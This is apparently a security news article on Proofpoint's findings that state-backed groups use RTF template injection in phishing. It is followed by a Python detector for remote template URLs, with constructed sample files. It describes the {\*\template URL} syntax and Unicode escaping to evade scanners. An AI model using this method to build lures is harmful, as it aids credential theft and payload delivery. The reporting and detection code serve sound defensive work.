State-backed hackers increasingly use RTF injection for phishing


Three APT hacking groups from India, Russia, and China have been observed using a novel RTF (rich text format) template injection technique in their recent phishing campaigns.
This technique is a simple yet effective method to retrieve malicious content from a remote URL, and threat analysts expect it to reach a wider audience of threat actors soon.
Researchers at Proofpoint noticed the first cases of weaponized RTF template injection in March 2021, and since then, actors have been steadily optimizing the technique.
A simple method to fetch payloads
Rich Text Format (RTF) files are a document format created by Microsoft that can be opened using Microsoft Word, WordPad, and other applications found on almost all operating systems.
When creating RTF files, you can include an RTF Template that specifies how the text in the document should be formatted. These templates are local files imported into an RTF viewer before displaying the contents of the file to format it correctly.
While RTF Templates are meant to be hosted locally, threat actors are now abusing this legitimate functionality to retrieve a URL resource instead of a local file resource.
This substitution allows threat actors to load malicious payloads into an application like Microsoft Word or perform NTLM authentication against a remote URL to steal Windows credentials. Additionally, as these files are transferred as RTF Templates, they are more likely to bypass detection of phishing lures, as they are not initially present in the RTF files.
Creating remote RTF Templates is very simple, as all a threat actor has to do is add the {\*\template URL} command into an RTF file using a hex editor, as shown below.

A URL-hiding example created by Proofpoint's researchers (Source: Proofpoint)
The method is also viable on doc.rtf files opened in Microsoft Word, forcing the app to retrieve the resource from the specified URL before serving the content to the victim, as shown below.

Microsoft Word retrieving the external resource (Source: Proofpoint)
Cases of abuse in the wild
Proofpoint has observed this payload retrieval method in phishing campaigns by the pro-Indian hacking group DoNot Team, the Russia-linked Gamaredon hacking group, and the TA423 threat actors.
A timeline of the observed activities is shown below.

Timeline of activities associated with RTF template injection (Source: Proofpoint)
RTF files can parse 16-bit Unicode characters, so threat actors have been using Unicode instead of plaintext strings for the injected URL resource to evade detection.

Using Unicode to hide the URL resource (Source: Proofpoint)
However, in some samples retrieved from the DoNot Team campaigns, Proofpoint noticed a failure to pass Microsoft Word's checks, resulting in an error message about the remote source being invalid.
Since these errors are generated before the decoy content is served to the target, the chances of success for DoNot's phishing attempts drop significantly.
TA423, on the other hand, did not obfuscate the injected URLs, trading a higher risk of detection and analysis for error-free loading in Microsoft Word.

TA423 lure using RTF Template injection (Source: Proofpoint)
Finally, in the case of Gamaredon, the researchers sampled RTF documents that impersonated Ukrainian government organizations to deliver an MP3 file as a remote resource.

MP3 file fetched as an external resource (Source: Proofpoint)
As RTF Template injections are easily accomplished using a hex editing tool and are not as heavily detected by antivirus scanners, they stand to become more widely used by threat actors.
“The viability of XML Office based remote template documents has proven that this type of delivery mechanism is a durable and effective method when paired with phishing as an initial delivery vector,” explained Proofpoint in their report.
“While this method currently is used by a limited number of APT actors with a range of sophistication, the technique’s effectiveness combined with its ease of use is likely to drive its adoption further across the threat landscape.”
Furthermore, as the malicious content is retrieved from a remote URL, it allows the threat actors to dynamically modify their campaigns in real time to use new payloads or different malicious behaviors.
To defend against this threat, you should avoid downloading and opening RTF files arriving via unsolicited emails, scan them with an AV scanner, and keep your Microsoft Office up to date by applying the latest available security updates.
Proofpoint also shared YARA signatures that admins can use to detect RTF files modified to include remote RTF Templates.
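
A minimal check for the technique described above, as an added example (not Proofpoint's YARA signatures and not code from the original article): it extracts the `\*\template` destination from an RTF file, decodes `\uN` and `\'hh` escapes, and reports targets that are URLs rather than local paths. The function names, the sample documents and the modulo-65536 handling of out-of-range `\uN` values are assumptions made for this illustration.

```python
import re

# Destination group that names the template: {\*\template <argument>}
TEMPLATE_RE = re.compile(r"\{\s*\\\*\s*\\template\s*([^{}]*)\}", re.IGNORECASE)
# \uN escape (signed decimal) plus an optional one-character fallback,
# or a \'hh hex escape.
ESCAPE_RE = re.compile(r"\\u(-?\d+) ?(?:\?|\\'[0-9a-fA-F]{2})?|\\'([0-9a-fA-F]{2})")
# Anything with a URI scheme is treated as remote; local paths have none.
REMOTE_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def decode_rtf_escapes(arg: str) -> str:
    """Resolve \\uN and \\'hh escapes so an encoded URL becomes readable."""
    def repl(m):
        if m.group(1) is not None:
            # Assumption: N is reduced modulo 2**16 (it is a 16-bit value).
            return chr(int(m.group(1)) % 65536)
        return chr(int(m.group(2), 16))
    return ESCAPE_RE.sub(repl, arg).strip()


def find_remote_templates(rtf: bytes) -> list[str]:
    """Return decoded \\*\\template arguments that point at a URL."""
    text = rtf.decode("latin-1")  # byte-preserving decode
    hits = []
    for m in TEMPLATE_RE.finditer(text):
        target = decode_rtf_escapes(m.group(1))
        if REMOTE_RE.match(target):
            hits.append(target)
    return hits


# Constructed samples (not taken from any real campaign).
URL = "http://example.test/t.dotm"
LOCAL = rb"{\rtf1\ansi{\*\template C:\\Templates\\Normal.dotm}Hello}"
PLAIN = rb"{\rtf1\ansi{\*\template " + URL.encode() + rb"}Hello}"
ENCODED = (rb"{\rtf1\ansi{\*\template "
           + "".join(f"\\u{ord(c) - 65536}?" for c in URL).encode()
           + rb"}Hello}")

if __name__ == "__main__":
    for name, doc in [("local", LOCAL), ("plain", PLAIN), ("encoded", ENCODED)]:
        print(name, find_remote_templates(doc))
```

To scan a file on disk, pass its bytes: `find_remote_templates(open(path, "rb").read())`. A hit means the document asks the viewer to fetch its template over the network and should be triaged before it is opened in Word.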
